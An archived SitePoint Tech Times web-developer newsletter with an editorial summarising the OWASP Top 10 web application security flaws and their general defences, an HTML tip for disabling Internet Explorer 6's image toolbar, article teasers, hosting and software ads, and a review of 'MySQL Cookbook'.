| |
Tips, Tricks, News and Reviews for Web Coders
In This Issue...
|
 |
 |
 |
|
Note: This newsletter is supported solely by advertisers like the one
below. We stand 100% behind every ad that we run. If you ever have a
problem with a company that advertises here please contact us and we will
try to get it resolved. - Kevin Yank |
|
|
|
 |
|
 |
| |
Yes! Now You CAN
Compete With the Big Guys
 "Proposal Kit is great! I sold my first client
using one of its many functions (a pricing spreadsheet which calculates
your bid then exports to an HTML page). I sent the client the link...and
it was done.
I balked at the price when I first found it... but it is better than any
freebie you'll find out there anyway."
You get dozens of tools including:
-> Accurate cost estimate tools (Never quote by the hour!
-> Sales tools including customizable proposal letters
-> Legal contracts for US, UK, Australian and Canadian clients
Grow your
client base today -- with a 100% money-back guarantee
|
|
 |
|
 |
|
|
 |
|
|
| |
Hi, Tech
Timers!
Do you enjoy SitePoint content? Wish you could have that sort of stuff
featured on your site? Well now you can! We've just put together a new SitePoint
Content Syndication page that explains the different ways you can
feature SitePoint content on your site.
In this issue, I explain the Top 10 most common security vulnerabilities
in Web applications, as recently ranked by the Open Web Application Security Project
(OWASP). Our feature article describes PHP Assertions, a new feature in
PHP 4 that hasn't attracted the attention it deserves since its
introduction. And with the holiday season well behind us, we're returning
to our regular review schedule with "MySQL Cookbook", a new
O'Reilly book covered this issue.
Lastly, don't forget to visit SitePoint.com next week as we kick off our
.NET Theme Week on Monday!
Enjoy!
Kevin Yank
techtimes@sitepoint.com
We value your membership. If for some reason at this time it is
inconvenient for you, you may discontinue your subscription by simply
sending a "Blank" email to the following address: leave-techtimes-html-8530646R@lists.sitepoint.com. Scroll to
the very bottom of this issue for further instructions if you have
problems.
|
|
|
|
|
|
|
|
|
|
| |
Editorial
Top 10
Web Application Security Flaws
The Open Web Application
Security Project (OWASP) is an Open Source organization dedicated to
raising awareness of Web application and Web service security issues and
developing tools to address them.
OWASP recently published its Top Ten report (PDF, 336KB): a breakdown and analysis of the most
common security vulnerabilities that are found in today's Web
applications, and how to protect yourself against them.
It's definitely worth downloading the report, but here are their top 10
issues summarized if you're just curious what they are:
1. Unvalidated Parameters
Anything that a Web browser sends to a Web server as part of an HTTP
request (including headers, form fields, and cookies) can easily be forged
or corrupted to serve an attacker's agenda. Every piece of data that comes
from the client must therefore be submitted to rigorous scrutiny by a Web
application before it is trusted.
2. Broken Access Control
Access control is the process of limiting a user's access to particular
protected content once he or she has logged in. That is, even though he
has logged in to the company's Web site, an employee should not have
access to corporate payroll records unless he works in human resources.
The webs of overlapping permissions that can exist in such systems are
often problematic and prone to hacking.
3. Broken Account and Session Management
This vulnerability has to do with the actual login/authentication process,
and how that login is subsequently maintained. Proper design of session
IDs and features such as "e-mail me my password" can greatly
narrow common angles of attack that would allow a hacker to assume the
identity of an authorized user on your site.
4. Cross-Site Scripting (XSS) Flaws
XSS attacks occur when a hacker is able to use some perfectly legal
facility of a Web application to cause that application to send malicious
code that will attack another user. The typical example is JavaScript
embedded in a forum post that will attack users who read that post.
Carefully-crafted filtering is necessary to thwart this type of attack.
5. Buffer Overflows
Anyone who works on the Web has likely hard of a buffer overflows. These
occur when carefully-formatted input can cause the server software hosting
a Web application (or in fewer cases, the Web application itself) to
corrupt its own memory space, causing either a crash or an exploitable
breach in security. Keep your server software up-to-date and, if you write
Web applications in a low-level language, practice safe memory
allocation.
6. Command Injection Flaws
Related to Issue #1 (Unvalidated Parameters), command injection flaws
occur when user input is interpreted by the Web application or an external
application that it calls (e.g. a database server) as a command. By
carefully formatting input so that it contains malicious code, an attacker
can exploit these flaws to run that code on your server. Careful
validation and encoding of user input can protect against these flaws.
7. Error Handling Problems
When a problem occurs (or is caused by an attacker), the error messages
that are generated may often provide tidbits of information that will
assist attackers in exploiting other vulnerabilities in your site. Also,
access control scripts must be carefully designed so that they don't
mistakenly grant access in the event of an error.
8. Insecure Use of Cryptography
Realising that sensitive information should be protected with encryption
is only half the battle. Inexperienced developers can choose the wrong
encryption method for a given task, naively design custom encryption that
is easily compromised, leave the keys/certificates for encryption
unprotected, or fail to encrypt data at critical junctures (such as when
transmitting it via e-mail).
9. Remote Administration Flaws
Though normally heavily protected, Web-based site administration
interfaces are often the most heavily-targeted part of a site when it
comes to hack attempts. Not taking sufficient measures to protect access
to administration interfaces, or building administration interfaces that
are unnecessarily powerful (and therefore destructive in the wrong hangs)
is flirting with disaster.
10. Web and Application Server Misconfiguration
No matter how securely a Web application is written, if the server
software it runs on is improperly configured, all bets are off. Applying
security patches, disabling unnecessary services, assigning non-default
passwords, and ensuring software is properly configured to support the
security features of the Web application are all important concerns --
especially when the application is deployed on a 3rd party server that
does not fall within the purview of the application developer.
In addition to the 27 page Top Ten, OWASP has also produced a 70 page Guide to Building
Secure Web Applications and Web Services that is well worth a read,
as well as a number of software tools, both educational and practical in
nature.
Your insecure editor,
Kevin Yank
Editor, The SitePoint Tech Times
|
|
|
|
|
|
|
|
|
|
| |
Need someone
to host your website?
FoundHost.com brings the best hosting companies together in one place.
Browse our showcase categories, read the latest industry news and
articles, or search for your specific needs from a database of thousands
of web hosting companies.
NEW! - Hosting Plan Auctions
Bid on hosting plans being offered by web hosting companies. FoundHost.com
- We found your next host!
http://www.foundhost.com/ |
|
|
|
|
|
|
|
|
|
| |
Quick Tip
Disabling
Internet Explorer 6's Image Toolbar
As of version 6.0,
Internet Explorer for Windows will display a little toolbar at the top of
any large image when you hover your mouse over it. The toolbar presents
options to save, email, and print the image, and offers quick access to
the user's "My Pictures" folder.
In many instances, this toolbar can be a distracting eyesore; fortunately,
it is easy to disable. Simply add the following <meta> tag inside
the <head> tag of the page to turn off the image toolbar:
<meta http-equiv="imagetoolbar" content="no"
/>
This approach disables the toolbar for all images on the page. If you
prefer to disable it only for a specific image, use the galleryimg
attribute for the <img> tag instead:
<img src="myPic.gif" galleryimg="no" />
This feature can also be disabled in the user's preferences (this is one
of the first things I configure after a new Windows installation for
myself), so don't count on it being available, either.
|
|
|
|
|
|
| | |
|
|
|
| |
New Technical Articles at SitePoint.com
 |
 |
 |
|
 Feature
Article
Effortless (or Better!) Bug Detection with PHP
Assertions
By Webb Stacey
PHP has had assertions since version 4.0, so why hasn't this
time-saving tool attracted more attention? Webb aims to correct this
travesty by explaining what assertions are and how to put them to work
spotting bugs in your code that you might otherwise miss!
Full Story
|
|
 |
|
 |
Customize Dreamweaver to Your Needs
By Jason Siegel
If you've assumed that the Dreamweaver defaults are right for you,
then think again. Jason shows how easy it is to customize Dreamweaver to
the settings you *really* want.
Full Story
Plan a Great Client Login System
By Sam Hastings
If you have a few clients on the books, it might be time to add a
client login area to your site. Sam shows how to plan a client area that's
secure, functional, and customisable.
Full Story
Review - Microsoft Visio Professional 2002
By Patrick O'Keefe
High-end Web developers and site owners across the globe swear by it
- but MS Visio has a hefty price tag. Is it *really* worth it? Patrick
finds out.
Full Story
|
|
|
|
|
|
| | |
|
|
|
| |
Kev's Bookshelf
New releases for January
MySQL Cookbook Paul DuBois (O'Reilly)
$34.97
 Paul DuBois wrote the
first MySQL book I ever read: "MySQL", published by New Riders
(see my
review). To this day I have nothing but good things to say about that
book, so the opportunity to take a look at his latest MySQL book was
irresistible!
The latest in O'Reilly's relatively new Cookbook series, MySQL Cookbook adopts the same formula of exploring all aspects of a
product through short, practical "How-To" articles. Here are a
few examples of the "recipes" you'll find in this book:
- Producing XML Output
- Writing an Object-Oriented MySQL Interface for PHP
- What to do when LIMIT Requires the "Wrong" Sort Order
- Using a FULLTEXT Search with Short Words
- Counting and Identifying Duplicates
- Using MySQL-Based Storage with the PHP Session Manager
Those are just six of the over 300 recipes in the book!
Each recipe is cleverly designed to explain the problem, then very briefly
sum up the solution, then provide the full solution, code and all. The
summary is usually only a sentence or two, but it's enough to jog your
memory if you already know how to do something and just need a
reminder.
Most impressive is that this entire collection of recipes was written by
Paul DuBois -- a man who now holds both the first and second spots in my
list of top MySQL books!
Every month, I take a look at the new titles that adorn my
bookshelf
from popular publishers like Wrox and O'Reilly, and also give you a heads
up on new
titles that are on the way!
|
|
|
|
|
|
|
|
|
